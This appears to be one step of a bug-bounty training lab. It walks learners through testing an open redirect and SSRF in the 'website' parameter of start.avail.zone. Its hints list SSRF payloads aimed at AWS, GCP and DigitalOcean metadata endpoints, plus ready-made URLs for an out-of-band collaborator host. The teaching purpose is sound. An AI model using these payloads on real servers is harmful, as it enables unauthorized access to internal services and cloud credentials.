Hintru ENES ← Todos los labs

Avail.zone – Open Redirect / SSRF via website Parameter

EN easy bug bounty writeup Open RedirectSSRFparameter injectionURL manipulationphishingrecon

A phishing/spam email promotes a 'free partnership tool' at start.avail.zone. The invite URL passes a domain through a query parameter — what does the server actually do with it? Investigate the request flow and find an abuse path that could turn this 'invite' into something nastier.

0/5
resueltos
Paso 1 Paso 2 Paso 3 Paso 4 Paso 5
web

Paso 4 · Probe Whether the Server Fetches Your URL

Objetivo: Determine whether the server itself fetches the supplied URL, enabling SSRF against internal or cloud metadata services.

Contexto: If the backend fetches the `website` value server-side (e.g. to scrape the target site, take a screenshot, or verify it exists), the vulnerability escalates from Open Redirect to SSRF.

Pistas progresivas

Revela solo las que necesites. Claude lleva la cuenta de cuántas usaste para calibrar la retroalimentación.

Pista 1 — empujón direccional

Set up an out-of-band listener (Burp Collaborator, interactsh, or a simple netcat/HTTP server on a VPS). Supply its address in the `website` parameter and check for inbound connections that originate from the avail.zone server — not your browser.

Pista 2 — técnica / clase de vuln

SSRF payloads to try:
- Your Collaborator URL (confirms server-side fetch)
- http://169.254.169.254/latest/meta-data/ (AWS IMDSv1)
- http://metadata.google.internal/ (GCP)
- http://169.254.169.254/metadata/v1/ (DigitalOcean)

Pista 3 — casi la solución

Use:
https://start.avail.zone/build-connections?website=http://169.254.169.254/latest/meta-data/
or
https://start.avail.zone/build-connections?website=https://YOUR-ID.oastify.com

If Collaborator logs an HTTP request from an IP belonging to avail.zone's infrastructure, SSRF is confirmed. If the page reflects content from the internal URL, it's a blind→semi-blind SSRF.

Tu intento